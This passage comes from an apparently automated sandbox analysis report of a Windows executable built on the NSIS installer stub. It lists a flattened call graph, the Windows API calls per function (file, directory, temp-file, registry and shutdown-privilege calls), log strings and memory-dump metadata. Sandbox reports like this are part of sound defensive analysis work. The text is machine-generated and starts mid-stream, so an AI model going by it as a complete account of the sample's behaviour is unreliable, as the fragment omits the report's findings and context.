calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 
3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 
3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 
4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 
3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 
3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 
4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW lstrcmpW 4966->4967 4968 
4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4115 401a1f 4116 40145c 18 API calls 4115->4116 4117 401a26 4116->4117 4118 4062a3 11 API calls 4117->4118 4119 401a49 4118->4119 4120 401a64 4119->4120 4121 401a5c 4119->4121 4169 406009 lstrcpynW 4120->4169 4168 406009 lstrcpynW 4121->4168 4124 401a62 4128 406038 5 API calls 4124->4128 4125 401a6f 4126 406722 3 API calls 4125->4126 4127 401a75 lstrcatW 4126->4127 4127->4124 4130 401a81 4128->4130 4129 4062d5 2 API calls 4129->4130 4130->4129 4131 405e30 2 API calls 4130->4131 4133 401a98 CompareFileTime 4130->4133 4134 401ba9 4130->4134 4138 4062a3 11 API calls 4130->4138 4142 406009 lstrcpynW 4130->4142 4148 406805 18 API calls 4130->4148 4155 405ca0 MessageBoxIndirectW 4130->4155 4159 401b50 4130->4159 4166 401b5d 4130->4166 4167 405e50 GetFileAttributesW CreateFileW 4130->4167 4131->4130 4133->4130 4135 404f72 25 API calls 

                          Control-flow Graph

                          APIs
                          • #17.COMCTL32 ref: 004038A2
                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                          • OleInitialize.OLE32(00000000), ref: 004038B4
                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                          • OleUninitialize.OLE32(?), ref: 00403AD1
                          • ExitProcess.KERNEL32 ref: 00403AF1
                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                          • API String ID: 2435955865-239407132
                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                          APIs
                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                          • FindClose.KERNEL32(00000000), ref: 004062EC
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID:
                          • API String ID: 2295610775-0
                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                          Control-flow Graph

                          APIs
                          • PostQuitMessage.USER32(00000000), ref: 00401648
                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                          • SetForegroundWindow.USER32(?), ref: 004016CB
                          • ShowWindow.USER32(?), ref: 00401753
                          • ShowWindow.USER32(?), ref: 00401767
                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                          • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                          Strings
                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                          • CreateDirectory: "%s" created, xrefs: 00401849
                          • Rename failed: %s, xrefs: 0040194B
                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                          • Call: %d, xrefs: 0040165A
                          • Rename: %s, xrefs: 004018F8
                          • detailprint: %s, xrefs: 00401679
                          • SetFileAttributes failed., xrefs: 004017A1
                          • Sleep(%d), xrefs: 0040169D
                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                          • Rename on reboot: %s, xrefs: 00401943
                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                          • BringToFront, xrefs: 004016BD
                          • Aborting: "%s", xrefs: 0040161D
                          • Jump: %d, xrefs: 00401602
                          Memory Dump Source
                          • Source File: 00000003.00000002.1749837140.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1749821392.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000040B000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.000000000041F000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1749959907.0000000000461000.00000004.00000001.01000000.00000008.sdmp
                          • Associated: 00000003.00000002.1750129896.00000000004F4000.00000002.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_MmReveals.jbxd
                          Similarity
                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
